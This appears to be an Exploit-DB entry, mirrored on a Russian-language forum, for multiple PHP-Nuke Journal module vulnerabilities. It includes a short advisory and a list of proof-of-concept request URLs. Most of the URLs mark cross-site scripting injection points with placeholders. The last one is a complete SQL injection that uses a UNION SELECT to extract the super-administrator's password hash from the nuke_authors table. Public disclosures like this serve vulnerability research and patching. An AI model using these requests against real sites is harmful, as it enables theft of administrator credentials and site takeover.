- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24232
- Проверка EDB
-
- Пройдено
- Автор
- JANEK VIND
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2004-06-23
Код:
source: https://www.securityfocus.com/bid/10595/info
PHP-Nuke is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data and may allow an attacker to carry out cross-site scripting, HTML injection, and SQL injection attacks.
Although unconfirmed, all versions of PHP-Nuke are considered to be vulnerable at this point. This BID will be updated as more information becomes available.
http://www.example.com/nuke73/modules.php?name=Journal&file=friend&jid=2&yun=[xss code here]
http://www.example.com/nuke73/modules.php?name=Journal&file=friend&jid=2&ye=[xss code here]
http://www.example.com/nuke73/modules.php?name=Journal&file=add&filelist[]=[xss
code here]
http://www.example.com/nuke73/modules.php?name=Journal&file=modify&filelist[]=[xss
code here]
http://www.example.com/nuke73/modules.php?name=Journal&file=delete&jid=[xss
code here]&forwhat=waraxe
http://www.example.com/nuke73/modules.php?name=Journal&file=comment&onwhat=[xss
code here]
http://www.example.com/nuke73/modules.php?name=Journal&file=commentsave&rid=[xsscode here]
http://www.example.com/nuke73/modules.php?name=Journal&file=commentkill&onwhat=1
http://www.example.com/nuke73/modules.php?name=Journal&file=savenew&title=f00bar
http://www.example.com/nuke73/modules.php?name=Journal&file=search&bywhat=aid&exact=1
&forwhat=kala'/**/UNION/**/SELECT/**/0,0,pwd,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*
- Источник
- www.exploit-db.com